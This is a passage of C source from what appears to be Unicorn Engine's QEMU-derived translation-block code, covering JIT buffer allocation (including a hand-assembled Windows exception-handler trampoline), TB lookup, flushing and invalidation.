(base_end >= right) { size = base_end - base; // whoops, we are almost run out of memory! Commit all instead } if (VirtualAlloc(base, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)) { return EXCEPTION_CONTINUE_EXECUTION; } else { return EXCEPTION_CONTINUE_SEARCH; } } } return EXCEPTION_CONTINUE_SEARCH; } static inline void may_remove_handler(struct uc_struct *uc) { if (uc->seh_closure) { if (uc->seh_handle) { RemoveVectoredExceptionHandler(uc->seh_handle); } VirtualFree(uc->seh_closure, 0, MEM_RELEASE); } } static inline void *alloc_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; size_t size = tcg_ctx->code_gen_buffer_size; uint8_t *closure, *data; uint8_t *ptr; void* handler = code_gen_buffer_handler; may_remove_handler(uc); // Naive trampoline implementation closure = VirtualAlloc(NULL, CLOSURE_SIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (!closure) { return NULL; } uc->seh_closure = closure; data = closure + CLOSURE_SIZE /2; #ifdef _WIN64 ptr = closure; *ptr = 0x48; // REX.w ptr += 1; *ptr = 0xb8; // mov rax ptr += 1; memcpy(ptr, &data, 8); // mov rax, &data ptr += 8; // ; rax = &data // mov [rax], rdx ; save rdx // mov rdx, [rax+0x8] ; move uc pointer to 2nd arg // sub rsp, 0x10; reserve 2 slots as ms fastcall requires // call [rax + 0x10] ; go to handler const char tramp[] = "\x48\x89\x10\x48\x8b\x50\x08\x48\x83\xec\x10\xff\x50\x10"; memcpy(ptr, (void*)tramp, sizeof(tramp) - 1); // Note last zero! ptr += sizeof(tramp) - 1; *ptr = 0x48; // REX.w ptr += 1; *ptr = 0xba; // mov rdx ptr += 1; memcpy(ptr, &data, 8); // mov rdx, &data ptr += 8; // ; rdx = &data // add rsp, 0x10 ; clean stack // mov rdx, [rdx] ; restore rdx // ret const char tramp2[] = "\x48\x83\xc4\x10\x48\x8b\x12\xc3"; memcpy(ptr, (void*)tramp2, sizeof(tramp2) - 1); memcpy(data + 0x8, (void*)&uc, 8); memcpy(data + 0x10, (void*)&handler, 8); #else ptr = closure; *ptr = 0xb8; // mov eax ptr += 1; memcpy(ptr, (void*)&data, 4); // mov eax, &data ptr += 4; // ; eax = &data // mov [eax], edx; save edx // mov [eax+0x4], ecx; save ecx // mov ecx, [esp+4]; get ptr to exception because of cdecl // mov edx, [eax+0x8]; get ptr to uc // call [eax + 0xC]; get ptr to our handler, it's fastcall so we don't clean stac const char tramp[] = "\x89\x10\x89\x48\x04\x8b\x4c\x24\x04\x8b\x50\x08\xff\x50\x0c"; memcpy(ptr, (void*)tramp, sizeof(tramp) - 1); ptr += sizeof(tramp) - 1; *ptr = 0xb9; // mov ecx ptr += 1; memcpy(ptr, (void*)&data, 4); // mov ecx, &data ptr += 4; // mov edx, [ecx] ; restore edx // mov ecx, [ecx+4] ; restore ecx // ret const char tramp2[] = "\x8b\x11\x8b\x49\x04\xc3"; memcpy(ptr, (void*)tramp2, sizeof(tramp2) - 1); memcpy(data + 0x8, (void*)&uc, 4); memcpy(data + 0xC, (void*)&handler, 4); #endif uc->seh_handle = AddVectoredExceptionHandler(0, (PVECTORED_EXCEPTION_HANDLER)closure); if (!uc->seh_handle) { VirtualFree(uc->seh_closure, 0, MEM_RELEASE); uc->seh_closure = NULL; return NULL; } return VirtualAlloc(NULL, size, MEM_RESERVE, PAGE_EXECUTE_READWRITE); } void free_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; if (tcg_ctx->initial_buffer) { may_remove_handler(uc); VirtualFree(tcg_ctx->initial_buffer, 0, MEM_RELEASE); } } #else void free_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; if (tcg_ctx->initial_buffer) { if (munmap(tcg_ctx->initial_buffer, tcg_ctx->initial_buffer_size)) { perror("fail code_gen_buffer"); } } } static inline void *alloc_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int prot = PROT_WRITE | PROT_READ | PROT_EXEC; int flags = MAP_PRIVATE | MAP_ANONYMOUS; size_t size = tcg_ctx->code_gen_buffer_size; void *buf; #ifdef USE_MAP_JIT flags |= MAP_JIT; #endif buf = mmap(NULL, size, prot, flags, -1, 0); if (buf == MAP_FAILED) { return NULL; } #ifdef __mips__ if (cross_256mb(buf, size)) { /* * Try again, with the original still mapped, to avoid re-acquiring * the same 256mb crossing. */ size_t size2; void *buf2 = mmap(NULL, size, prot, flags, -1, 0); switch ((int)(buf2 != MAP_FAILED)) { case 1: if (!cross_256mb(buf2, size)) { /* Success! Use the new buffer. */ munmap(buf, size); break; } /* Failure. Work with what we had. */ munmap(buf2, size); /* fallthru */ default: /* Split the original buffer. Free the smaller half. */ buf2 = split_cross_256mb(tcg_ctx, buf, size); size2 = tcg_ctx->code_gen_buffer_size; if (buf == buf2) { munmap(buf + size2, size - size2); } else { munmap(buf, size - size2); } size = size2; break; } buf = buf2; } #endif /* Request large pages for the buffer. */ qemu_madvise(buf, size, QEMU_MADV_HUGEPAGE); return buf; } #endif /* USE_STATIC_CODE_GEN_BUFFER, WIN32, POSIX */ static inline void code_gen_alloc(struct uc_struct *uc, size_t tb_size) { TCGContext *tcg_ctx = uc->tcg_ctx; tcg_ctx->code_gen_buffer_size = size_code_gen_buffer(tb_size); tcg_ctx->code_gen_buffer = alloc_code_gen_buffer(uc); tcg_ctx->initial_buffer = tcg_ctx->code_gen_buffer; tcg_ctx->initial_buffer_size = tcg_ctx->code_gen_buffer_size; uc->tcg_buffer_size = tcg_ctx->initial_buffer_size; if (tcg_ctx->code_gen_buffer == NULL) { fprintf(stderr, "Could not allocate dynamic translator buffer\n"); exit(1); } } static bool tb_cmp(struct uc_struct *uc, const void *ap, const void *bp) { const TranslationBlock *a = ap; const TranslationBlock *b = bp; return a->pc == b->pc && a->cs_base == b->cs_base && a->flags == b->flags && (tb_cflags(a) & CF_HASH_MASK) == (tb_cflags(b) & CF_HASH_MASK) && a->trace_vcpu_dstate == b->trace_vcpu_dstate && a->page_addr[0] == b->page_addr[0] && a->page_addr[1] == b->page_addr[1]; } static void tb_htable_init(struct uc_struct *uc) { unsigned int mode = QHT_MODE_AUTO_RESIZE; qht_init(&uc->tcg_ctx->tb_ctx.htable, tb_cmp, CODE_GEN_HTABLE_SIZE, mode); } static void uc_tb_flush(struct uc_struct *uc) { tb_exec_unlock(uc); tb_flush(uc->cpu); tb_exec_lock(uc); } static void uc_invalidate_tb(struct uc_struct *uc, uint64_t start_addr, size_t len) { tb_page_addr_t start, end; uc->nested_level++; if (sigsetjmp(uc->jmp_bufs[uc->nested_level - 1], 0) != 0) { // We a get cpu fault in get_page_addr_code, ignore it. uc->nested_level--; return; } // GPA to ram addr // https://raw.githubusercontent.com/android/platform_external_qemu/master/docs/QEMU-MEMORY-MANAGEMENT.TXT // start_addr : GPA // start (returned): ram addr // (GPA -> HVA via memory_region_get_ram_addr(mr) + GPA + block->host, // GVA -> GPA via tlb & softmmu // HVA -> HPA via host mmu) start = get_page_addr_code(uc->cpu->env_ptr, start_addr) & (target_ulong)(-1); uc->nested_level--; // For 32bit target. end = (start + len) & (target_ulong)(-1); // We get a wrap? if (start > end) { return; } tb_invalidate_phys_range(uc, start, end); } static uc_err uc_gen_tb(struct uc_struct *uc, uint64_t addr, uc_tb *out_tb) { TranslationBlock *tb; target_ulong cs_base, pc; CPUState *cpu = uc->cpu; CPUArchState *env = (CPUArchState *)cpu->env_ptr; uint32_t flags; uint32_t hash; uint32_t cflags = cpu->cflags_next_tb; if (cflags == -1) { cflags = curr_cflags(); } cpu_get_tb_cpu_state(env, &pc, &cs_base, &flags); // Unicorn: Our hack here. pc = addr; hash = tb_jmp_cache_hash_func(env->uc, pc); tb = cpu->tb_jmp_cache[hash]; cflags &= ~CF_CLUSTER_MASK; cflags |= ((uint32_t)cpu->cluster_index) << CF_CLUSTER_SHIFT; if (unlikely(!(tb && tb->pc == pc && tb->cs_base == cs_base && tb->flags == flags && tb->trace_vcpu_dstate == *cpu->trace_dstate && (tb_cflags(tb) & (CF_HASH_MASK | CF_INVALID)) == cflags))) { tb = tb_htable_lookup(cpu, pc, cs_base, flags, cflags); cpu->tb_jmp_cache[hash] = tb; if (tb == NULL) { mmap_lock(); tb = tb_gen_code(cpu, pc, cs_base, flags, cflags); mmap_unlock(); /* We add the TB in the virtual pc hash table for the fast lookup */ cpu->tb_jmp_cache[hash] = tb; } } // If we still couldn't generate a TB, it must be out of memory. if (tb == NULL) { return UC_ERR_NOMEM; } if (out_tb != NULL) { UC_TB_COPY(out_tb, tb); } return UC_ERR_OK; } /* Must be called before using the QEMU cpus. 'tb_size' is the size (in bytes) allocated to the translation buffer. Zero means default size. */ void tcg_exec_init(struct uc_struct *uc, uint32_t tb_size) { /* remove tcg object. init here. */ /* tcg class init: tcg-all.c:tcg_accel_class_init(), skip all. */ /* tcg object init: tcg-all.c:tcg_accel_instance_init(), skip all. */ /* tcg init: tcg-all.c: tcg_init(), skip all. */ /* run tcg_exec_init() here. */ uc->tcg_ctx = g_malloc(sizeof(TCGContext)); tcg_context_init(uc->tcg_ctx); uc->tcg_ctx->uc = uc; page_init(uc); tb_htable_init(uc); code_gen_alloc(uc, tb_size); tb_exec_unlock(uc); tcg_prologue_init(uc->tcg_ctx); tb_exec_lock(uc); /* cpu_interrupt_handler is not used in uc1 */ uc->l1_map = g_malloc0(sizeof(void *) * V_L1_MAX_SIZE); /* Invalidate / Cache TBs */ uc->uc_invalidate_tb = uc_invalidate_tb; uc->uc_gen_tb = uc_gen_tb; uc->tb_flush = uc_tb_flush; /* Inline hooks optimization */ uc->add_inline_hook = uc_add_inline_hook; uc->del_inline_hook = uc_del_inline_hook; } /* call with @p->lock held */ static inline void invalidate_page_bitmap(PageDesc *p) { assert_page_locked(p); g_free(p->code_bitmap); p->code_bitmap = NULL; p->code_write_count = 0; } static void tb_clean_internal(void **p, int x) { int i; void **q; if (x <= 1) { for (i = 0; i < V_L2_SIZE; i++) { q = p[i]; if (q) { g_free(q); } } g_free(p); } else { for (i = 0; i < V_L2_SIZE; i++) { q = p[i]; if (q) { tb_clean_internal(q, x - 1); } } g_free(p); } } void tb_cleanup(struct uc_struct *uc) { int i, x; void **p; if (uc) { if (uc->l1_map) { x = uc->v_l2_levels; if (x <= 0) { for (i = 0; i < uc->v_l1_size; i++) { p = uc->l1_map[i]; if (p) { g_free(p); uc->l1_map[i] = NULL; } } } else { for (i = 0; i < uc->v_l1_size; i++) { p = uc->l1_map[i]; if (p) { tb_clean_internal(p, x); uc->l1_map[i] = NULL; } } } } } } /* Set to NULL all the 'first_tb' fields in all PageDescs. */ static void page_flush_tb_1(struct uc_struct *uc, int level, void **lp) { int i; if (*lp == NULL) { return; } if (level == 0) { PageDesc *pd = *lp; for (i = 0; i < V_L2_SIZE; ++i) { page_lock(&pd[i]); pd[i].first_tb = (uintptr_t)NULL; invalidate_page_bitmap(pd + i); page_unlock(&pd[i]); } } else { void **pp = *lp; for (i = 0; i < V_L2_SIZE; ++i) { page_flush_tb_1(uc, level - 1, pp + i); } } } static void page_flush_tb(struct uc_struct *uc) { int i, l1_sz = uc->v_l1_size; for (i = 0; i < l1_sz; i++) { page_flush_tb_1(uc, uc->v_l2_levels, uc->l1_map + i); } } #if 0 static gboolean tb_host_size_iter(gpointer key, gpointer value, gpointer data) { const TranslationBlock *tb = value; size_t *size = data; *size += tb->tc.size; return false; } #endif /* flush all the translation blocks */ static void do_tb_flush(CPUState *cpu, run_on_cpu_data tb_flush_count) { mmap_lock(); /* If it is already been done on request of another CPU, * just retry. */ if (cpu->uc->tcg_ctx->tb_ctx.tb_flush_count != tb_flush_count.host_int) { goto done; } #if 0 if (DEBUG_TB_FLUSH_GATE) { size_t nb_tbs = tcg_nb_tbs(cpu->uc->tcg_ctx); size_t host_size = 0; tcg_tb_foreach(cpu->uc->tcg_ctx, tb_host_size_iter, &host_size); //printf("qemu: flush code_size=%zu nb_tbs=%zu avg_tb_size=%zu\n", // tcg_code_size(cpu->uc->tcg_ctx), nb_tbs, nb_tbs > 0 ? host_size / nb_tbs : 0); } CPU_FOREACH(cpu) { cpu_tb_jmp_cache_clear(cpu); } #else cpu_tb_jmp_cache_clear(cpu); #endif qht_reset_size(cpu->uc, &cpu->uc->tcg_ctx->tb_ctx.htable, CODE_GEN_HTABLE_SIZE); page_flush_tb(cpu->uc); tcg_region_reset_all(cpu->uc->tcg_ctx); /* XXX: flush processor icache at this point if cache flush is expensive */ cpu->uc->tcg_ctx->tb_ctx.tb_flush_count = cpu->uc->tcg_ctx->tb_ctx.tb_flush_count + 1; done: mmap_unlock(); } void tb_flush(CPUState *cpu) { unsigned tb_flush_count = cpu->uc->tcg_ctx->tb_ctx.tb_flush_count; do_tb_flush(cpu, RUN_ON_CPU_HOST_INT(tb_flush_count)); } /* * user-mode: call with mmap_lock held * !user-mode: call with @pd->lock held */ static inline void tb_page_remove(PageDesc *pd, TranslationBlock *tb) { TranslationBlock *tb1; uintptr_t *pprev; unsigned int n1; assert_page_locked(pd); pprev = &pd->first_tb; PAGE_FOR_EACH_TB(pd, tb1, n1) { if (tb1 == tb) { *pprev = tb1->page_next[n1]; return; } pprev = &tb1->page_next[n1]; } g_assert_not_reached(); } /* remove @orig from its @n_orig-th jump list */ static inline void tb_remove_from_jmp_list(TranslationBlock *orig, int n_orig) { uintptr_t ptr, ptr_locked; TranslationBlock *dest; TranslationBlock *tb; uintptr_t *pprev; int n; /* mark the LSB of jmp_dest[] so that no further jumps can be inserted */ ptr = atomic_or_fetch(&orig->jmp_dest[n_orig], 1); dest = (TranslationBlock *)(ptr & ~1); if (dest == NULL) { return; } ptr_locked = orig->jmp_dest[n_orig]; if (ptr_locked != ptr) { /* * The only possibility is that the jump was unlinked via * tb_jump_unlink(dest). Seeing here another destination would be a bug, * because we set the LSB above. */ g_assert(ptr_locked == 1 && dest->cflags & CF_INVALID); return; } /* * We first acquired the lock, and since the destination pointer matches, * we know for sure that @orig is in the jmp list. */ pprev = &dest->jmp_list_head; TB_FOR_EACH_JMP(dest, tb, n) { if (tb == orig && n == n_orig) { *pprev = tb->jmp_list_next[n]; /* no need to set orig->jmp_dest[n]; setting the LSB was enough */ return; } pprev = &tb->jmp_list_next[n]; } g_assert_not_reached(); } /* reset the jump entry 'n' of a TB so that it is not chained to another TB */ static inline void tb_reset_jump(TranslationBlock *tb, int n) { uintptr_t addr = (uintptr_t)((char *)tb->tc.ptr + tb->jmp_reset_offset[n]); tb_set_jmp_target(tb, n, addr); } /* remove any jumps to the TB */ static inline void tb_jmp_unlink(TranslationBlock *dest) { TranslationBlock *tb; int n; TB_FOR_EACH_JMP(dest, tb, n) { tb_reset_jump(tb, n); #ifdef _MSC_VER atomic_and((long *)&tb->jmp_dest[n], (uintptr_t)NULL | 1); #else atomic_and(&tb->jmp_dest[n], (uintptr_t)NULL | 1); #endif /* No need to clear the list entry; setting the dest ptr is enough */ } dest->jmp_list_head = (uintptr_t)NULL; } /* * In user-mode, call with mmap_lock held. * In !user-mode, if @rm_from_page_list is set, call with the TB's pages' * locks held. */ static void do_tb_phys_invalidate(TCGContext *tcg_ctx, TranslationBlock *tb, bool rm_from_page_list) { CPUState *cpu = tcg_ctx->uc->cpu; struct uc_struct *uc = tcg_ctx->uc; PageDesc *p; uint32_t h; tb_page_addr_t phys_pc; bool code_gen_locked; assert_memory_lock(); code_gen_locked = tb_exec_is_locked(uc); tb_exec_unlock(uc); /* make sure no further incoming jumps will be chained to this TB */ tb->cflags = tb->cflags | CF_INVALID; /* remove the TB from the hash list */ phys_pc = tb->page_addr[0] + (tb->pc & ~TARGET_PAGE_MASK); h = tb_hash_func(phys_pc, tb->pc, tb->flags, tb_cflags(tb) & CF_HASH_MASK, tb->trace_vcpu_dstate); if (!(tb->cflags & CF_NOCACHE) && !qht_remove(&tcg_ctx->tb_ctx.htable, tb, h)) { tb_exec_change(uc, code_gen_locked); return; } /* remove the TB from the page list */ if (rm_from_page_list) { p = page_find(tcg_ctx->uc, tb->page_addr[0] >> TARGET_PAGE_BITS); tb_page_remove(p, tb); invalidate_page_bitmap(p); if (tb->page_addr[1] != -1) { p = page_find(tcg_ctx->uc, tb->page_addr[1] >> TARGET_PAGE_BITS); tb_page_remove(p, tb); invalidate_page_bitmap(p); } } /* remove the TB from the hash list */ h = tb_jmp_cache_hash_func(uc, tb->pc); if (cpu->tb_jmp_cache[h] == tb) { cpu->tb_jmp_cache[h] = NULL; } /* suppress this TB from the two jump lists */ tb_remove_from_jmp_list(tb, 0); tb_remove_from_jmp_list(tb, 1); /* suppress any remaining jumps to this TB */ tb_jmp_unlink(tb); tcg_ctx->tb_phys_invalidate_count = tcg_ctx->tb_phys_invalidate_count + 1; tb_exec_change(uc, code_gen_locked); } static void tb_phys_invalidate__locked(TCGContext *tcg_ctx, TranslationBlock *tb) { do_tb_phys_invalidate(tcg_ctx, tb, true); } /* invalidate one TB * * Called with mmap_lock held in user-mode. */ void tb_phys_invalidate(TCGContext *tcg_ctx, TranslationBlock *tb, tb_page_addr_t page_addr) { if (page_addr == -1 && tb->page_addr[0] != -1) { page_lock_tb(tcg_ctx->uc, tb); do_tb_phys_invalidate(tcg_ctx, tb, true); page_unlock_tb(tcg_ctx->uc, tb); } else { do_tb_phys_invalidate(tcg_ctx, tb, false); } } /* call with @p->lock held */ static void build_page_bitmap(struct uc_struct *uc, PageDesc *p) { int n, tb_start, tb_end; TranslationBlock *tb; assert_page_locked(p); p->code_bitmap = bitmap_new(TARGET_PAGE_SIZE); PAGE_FOR_EACH_TB(p, tb, n) { /* NOTE: this is subtle as a TB may span two physical pages */ if (n == 0) { /* NOTE: tb_end may be after the end of the page, but it is not a problem */ tb_start = tb->pc & ~TARGET_PAGE_MASK; tb_end = tb_start + tb->size; if (tb_end > TARGET_PAGE_SIZE) { tb_end = TARGET_PAGE_SIZE; } } else { tb_start = 0; tb_end = ((tb->pc + tb->size) & ~TARGET_PAGE_MASK); } qemu_bitmap_set(p->code_bitmap, tb_start, tb_end - tb_start); } } /* add the tb in the target page and protect it if necessary * * Called with mmap_lock held for user-mode emulation. * Called with @p->lock held in !user-mode. */ static inline void tb_page_add(struct uc_struct *uc, PageDesc *p, TranslationBlock *tb, unsigned int n, tb_page_addr_t page_addr) { bool page_already_protected; assert_page_locked(p); tb->page_addr[n] = page_addr; tb->page_next[n] = p->first_tb; page_already_protected = p->first_tb != (uintptr_t)NULL; p->first_tb = (uintptr_t)tb | n; invalidate_page_bitmap(p); /* if some code is already present, then the pages are already protected. So we handle the case where only the first TB is allocated in a physical page */ if (!page_already_protected) { tlb_protect_code(uc, page_addr); } } /* add a new TB and link it to the physical page tables. phys_page2 is * (-1) to indicate that only one page contains the TB. * * Called with mmap_lock held for user-mode emulation. * * Returns a pointer @tb, or a pointer to an existing TB that matches @tb. * Note that in !user-mode, another thread might have already added a TB * for the same block of guest code that @tb corresponds to. In that case, * the caller should discard the original @tb, and use instead the returned TB. */ static TranslationBlock * tb_link_page(struct uc_struct *uc, TranslationBlock *tb, tb_page_addr_t phys_pc, tb_page_addr_t phys_page2) { PageDesc *p; PageDesc *p2 = NULL; assert_memory_lock(); if (phys_pc == -1) { /* * If the TB is not associated with a physical RAM page then * it must be a temporary one-insn TB, and we have nothing to do * except fill in the page_addr[] fields. */ assert(tb->cflags & CF_NOCACHE); tb->page_addr[0] = tb->page_addr[1] = -1; return tb; } /* * Add the TB to the page list, acquiring first the pages's locks. * We keep the locks held until after inserting the TB in the hash table, * so that if the insertion fails we know for sure that the TBs are still * in the page descriptors. * Note that inserting into the hash table first isn't an option, since * we can only insert TBs that are fully initialized. */ page_lock_pair(uc, &p, phys_pc, &p2, phys_page2, 1); tb_page_add(uc, p, tb, 0, phys_pc & TARGET_PAGE_MASK); if (p2) { tb_page_add(uc, p2, tb, 1, phys_page2); } else { tb->page_addr[1] = -1; } if (!(tb->cflags & CF_NOCACHE)) { void *existing_tb = NULL; uint32_t h; /* add in the hash table */ h = tb_hash_func(phys_pc, tb->pc, tb->flags, tb->cflags & CF_HASH_MASK, tb->trace_vcpu_dstate); tb->hash = h; // unicorn needs this so it can remove this tb qht_insert(uc, &uc->tcg_ctx->tb_ctx.htable, tb, h, &existing_tb); /* remove TB from the page(s) if we couldn't insert it */ if (unlikely(existing_tb)) { tb_page_remove(p, tb); invalidate_page_bitmap(p); if (p2) { tb_page_remove(p2, tb); invalidate_page_bitmap(p2); } tb = existing_tb; } } if (p2 && p2 != p) { page_unlock(p2); } page_unlock(p); return tb; } /* Called with mmap_lock held for user mode emulation. */ TranslationBlock *tb_gen_code(CPUState *cpu, target_ulong pc, target_ulong cs_base, uint32_t flags, int cflags) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif TCGContext *tcg_ctx = cpu->uc->tcg_ctx; CPUArchState *env = cpu->env_ptr; TranslationBlock *tb, *existing_tb; tb_page_addr_t phys_pc, phys_page2; target_ulong virt_page2; tcg_insn_unit *gen_code_buf; int gen_code_size, search_size, max_insns; assert_memory_lock(); #ifdef HAVE_PTHREAD_JIT_PROTECT tb_exec_unlock(cpu->uc); #endif phys_pc = get_page_addr_code(env, pc); if (phys_pc == -1) { /* Generate a temporary TB; do not cache */ cflags |= CF_NOCACHE; } cflags &= ~CF_CLUSTER_MASK; cflags |= ((uint32_t)cpu->cluster_index) << CF_CLUSTER_SHIFT; max_insns = cflags & CF_COUNT_MASK; if (max_insns == 0) { max_insns = CF_COUNT_MASK; } if (max_insns > TCG_MAX_INSNS) { max_insns = TCG_MAX_INSNS; } if (cpu->singlestep_enabled) { max_insns = 1; } buffer_overflow: tb = tcg_tb_alloc(tcg_ctx); if (unlikely(!tb)) { /* flush must be done */ tb_flush(cpu); mmap_unlock(); /* Make the execution loop process the flush as soon as possible. */ cpu->exception_index = EXCP_INTERRUPT; cpu_loop_exit(cpu); } gen_code_buf = tcg_ctx->code_gen_ptr; tb->tc.ptr = gen_code_buf; tb->pc = pc; tb->cs_base = cs_base; tb->flags = flags; tb->cflags = cflags; tb->orig_tb = NULL; tb->trace_vcpu_dstate = *cpu->trace_dstate; tcg_ctx->tb_cflags = cflags; tb_overflow: tcg_func_start(tcg_ctx); tcg_ctx->cpu = env_cpu(env); UC_TRACE_START(UC_TRACE_TB_TRANS); gen_intermediate_code(cpu, tb, max_insns); UC_TRACE_END(UC_TRACE_TB_TRANS, "[uc] translate tb 0x%" PRIx64 ": ", tb->pc); tcg_ctx->cpu = NULL; /* generate machine code */ tb->jmp_reset_offset[0] = TB_JMP_RESET_OFFSET_INVALID; tb->jmp_reset_offset[1] = TB_JMP_RESET_OFFSET_INVALID; tcg_ctx->tb_jmp_reset_offset = tb->jmp_reset_offset; if (TCG_TARGET_HAS_direct_jump) { tcg_ctx->tb_jmp_insn_offset = tb->jmp_target_arg; tcg_ctx->tb_jmp_target_addr = NULL; } else { tcg_ctx->tb_jmp_insn_offset = NULL; tcg_ctx->tb_jmp_target_addr = tb->jmp_target_arg; } gen_code_size = tcg_gen_code(tcg_ctx, tb); if (unlikely(gen_code_size < 0)) { switch (gen_code_size) { case -1: /* * Overflow of code_gen_buffer, or the current slice of it. * * TODO: We don't need to re-do gen_intermediate_code, nor * should we re-do the tcg optimization currently hidden * inside tcg_gen_code. All that should be required is to * flush the TBs, allocate a new TB, re-initialize it per * above, and re-do the actual code generation. */ goto buffer_overflow; case -2: /* * The code generated for the TranslationBlock is too large. * The maximum size allowed by the unwind info is 64k. * There may be stricter constraints from relocations * in the tcg backend. * * Try again with half as many insns as we attempted this time. * If a single insn overflows, there's a bug somewhere... */ max_insns = tb->icount; assert(max_insns > 1); max_insns /= 2; goto tb_overflow; default: g_assert_not_reached(); } } search_size = encode_search(cpu->uc, tb, (uint8_t *)gen_code_buf + gen_code_size); if (unlikely(search_size < 0)) { goto buffer_overflow; } tb->tc.size = gen_code_size; tcg_ctx->code_gen_ptr = (void *) ROUND_UP((uintptr_t)gen_code_buf + gen_code_size + search_size, CODE_GEN_ALIGN); /* init jump list */ tb->jmp_list_head = (uintptr_t)NULL; tb->jmp_list_next[0] = (uintptr_t)NULL; tb->jmp_list_next[1] = (uintptr_t)NULL; tb->jmp_dest[0] = (uintptr_t)NULL; tb->jmp_dest[1] = (uintptr_t)NULL; /* init original jump addresses which have been set during tcg_gen_code() */ if (tb->jmp_reset_offset[0] != TB_JMP_RESET_OFFSET_INVALID) { tb_reset_jump(tb, 0); } if (tb->jmp_reset_offset[1] != TB_JMP_RESET_OFFSET_INVALID) { tb_reset_jump(tb, 1); } /* check next page if needed */ virt_page2 = (pc + tb->size - 1) & TARGET_PAGE_MASK; phys_page2 = -1; if ((pc & TARGET_PAGE_MASK) != virt_page2) { phys_page2 = get_page_addr_code(env, virt_page2); } /* Undoes tlb_set_dirty in notdirty_write. */ if (!(HOOK_EXISTS(cpu->uc, UC_HOOK_MEM_READ) || HOOK_EXISTS(cpu->uc, UC_HOOK_MEM_WRITE))) { tlb_reset_dirty_by_vaddr(cpu, pc & TARGET_PAGE_MASK, (pc & ~TARGET_PAGE_MASK) + tb->size); } /* * No explicit memory barrier is required -- tb_link_page() makes the * TB visible in a consistent state. */ existing_tb = tb_link_page(cpu->uc, tb, phys_pc, phys_page2); /* if the TB already exists, discard what we just translated */ if (unlikely(existing_tb != tb)) { uintptr_t orig_aligned = (uintptr_t)gen_code_buf; orig_aligned -= ROUND_UP(sizeof(*tb), tcg_ctx->uc->qemu_icache_linesize); tcg_ctx->code_gen_ptr = (void *)orig_aligned; return existing_tb; } tcg_tb_insert(tcg_ctx, tb); return tb; } /* * @p must be non-NULL. * user-mode: call with mmap_lock held. * !user-mode: call with all @pages locked. */ static void tb_invalidate_phys_page_range__locked(struct uc_struct *uc, struct page_collection *pages, PageDesc *p, tb_page_addr_t start, tb_page_addr_t end, uintptr_t retaddr) { TranslationBlock *tb; tb_page_addr_t tb_start, tb_end; int n; #ifdef TARGET_HAS_PRECISE_SMC CPUState *cpu = uc->cpu; CPUArchState *env = NULL; bool current_tb_not_found = retaddr != 0; bool current_tb_modified = false; TranslationBlock *current_tb = NULL; target_ulong current_pc = 0; target_ulong current_cs_base = 0; uint32_t current_flags = 0; #endif /* TARGET_HAS_PRECISE_SMC */ assert_page_locked(p); #if defined(TARGET_HAS_PRECISE_SMC) if (cpu != NULL) { env = cpu->env_ptr; } #endif /* we remove all the TBs in the range [start, end[ */ /* XXX: see if in some cases it could be faster to invalidate all the code */ PAGE_FOR_EACH_TB(p, tb, n) { assert_page_locked(p); /* NOTE: this is subtle as a TB may span two physical pages */ if (n == 0) { /* NOTE: tb_end may be after the end of the page, but it is not a problem */ tb_start = tb->page_addr[0] + (tb->pc & ~TARGET_PAGE_MASK); tb_end = tb_start + tb->size; } else { tb_start = tb->page_addr[1]; tb_end = tb_start + ((tb->pc + tb->size) & ~TARGET_PAGE_MASK); } // Unicorn: We may indeed generate a TB without any instruction which breaks qemu assumption. if ( (!(tb_end <= start || tb_start >= end)) || (tb_start == tb_end) ) { #ifdef TARGET_HAS_PRECISE_SMC if (current_tb_not_found) { current_tb_not_found = false; /* now we have a real cpu fault */ current_tb = tcg_tb_lookup(uc->tcg_ctx, retaddr); } if (current_tb == tb && (tb_cflags(current_tb) & CF_COUNT_MASK) != 1) { /* * If we are modifying the current TB, we must stop * its execution. We could be more precise by checking * that the modification is after the current PC, but it * would require a specialized function to partially * restore the CPU state. */ current_tb_modified = true; cpu_restore_state_from_tb(cpu, current_tb, retaddr, true); cpu_get_tb_cpu_state(env, ¤t_pc, ¤t_cs_base, ¤t_flags); } #endif /* TARGET_HAS_PRECISE_SMC */ tb_phys_invalidate__locked(uc->tcg_ctx, tb); } } /* if no code remaining, no need to continue to use slow writes */ if (!p->first_tb) { invalidate_page_bitmap(p); tlb_unprotect_code(uc, start); } #ifdef TARGET_HAS_PRECISE_SMC if (current_tb_modified) { page_collection_unlock(pages); /* Force execution of one insn next time. */ cpu->cflags_next_tb = 1 | curr_cflags(); mmap_unlock(); cpu_loop_exit_noexc(cpu); } #endif } /* * Invalidate all TBs which intersect with the target physical address range * [start;end[. NOTE: start and end must refer to the *same* physical page. * 'is_cpu_write_access' should be true if called from a real cpu write * access: the virtual CPU will exit the current TB if code is modified inside * this TB. * * Called with mmap_lock held for user-mode emulation */ void tb_invalidate_phys_page_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end) { struct page_collection *pages; PageDesc *p; assert_memory_lock(); p = page_find(uc, start >> TARGET_PAGE_BITS); if (p == NULL) { return; } pages = page_collection_lock(uc, start, end); tb_invalidate_phys_page_range__locked(uc, pages, p, start, end, 0); page_collection_unlock(pages); } /* * Invalidate all TBs which intersect with the target physical address range * [start;end[. NOTE: start and end may refer to *different* physical pages. * 'is_cpu_write_access' should be true if called from a real cpu write * access: the virtual CPU will exit the current TB if code is modified inside * this TB. * * Called with mmap_lock held for user-mode emulation. */ void tb_invalidate_phys_range(struct uc_struct *uc, ram_addr_t start, ram_addr_t end) { struct page_collection *pages; tb_page_addr_t next; assert_memory_lock(); pages = page_collection_lock(uc, start, end); for (next = (start & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE; //start < end; Unicorn: Fix possible wrap around (intptr_t)(end - start) > 0; start = next, next += TARGET_PAGE_SIZE) { PageDesc *pd = page_find(uc, start >> TARGET_PAGE_BITS); tb_page_addr_t bound = MIN(next, end); if (pd == NULL) { continue; } tb_invalidate_phys_page_range__locked(uc, pages, pd, start, bound, 0); } page_collection_unlock(pages); } /* len must be <= 8 and start must be a multiple of len. * Called via softmmu_template.h when code areas are written to with * iothread mutex not held. * * Call with all @pages in the range [@start, @start + len[ locked. */ void 